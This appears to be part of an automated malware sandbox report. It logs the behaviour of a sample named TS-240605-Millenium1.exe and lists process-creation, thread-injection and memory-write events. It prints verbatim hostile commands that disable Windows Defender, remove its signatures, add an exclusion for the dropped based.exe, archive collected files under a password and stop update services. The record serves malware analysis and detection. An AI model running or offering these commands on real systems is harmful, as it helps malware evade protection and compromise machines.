Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe	Thread register set: target process: 7448
Source: C:\ProgramData\svchost.exe	Thread register set: target process: 7704
Source: C:\ProgramData\svchost.exe	Thread register set: target process: 7704
Source: C:\ProgramData\svchost.exe	Thread register set: target process: 7704
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 4544
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5940
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5088

Removes signatures from Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"			Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe	Memory written: C:\Windows\System32\dialer.exe base: 8E851E9010
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B550000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 87C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 293C71D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 124A2600000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 2DB0D940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22D67CF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 231E6560000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D280EE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29A47940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\Microsoft\based.exe base: 235BB850000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\Microsoft\based.exe base: 1EB88710000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2879CCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BCECE80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\svchost.exe base: 2C3F57C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\svchost.exe base: 23340F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 181280D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 261E5AC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EC96960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\timeout.exe base: 285327A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EC96AF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D8E5800000
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6C617B8010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: FF10D1D010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: B54D3D2010
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD5EB0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E62480000

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
Source: C:\ProgramData\svchost.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
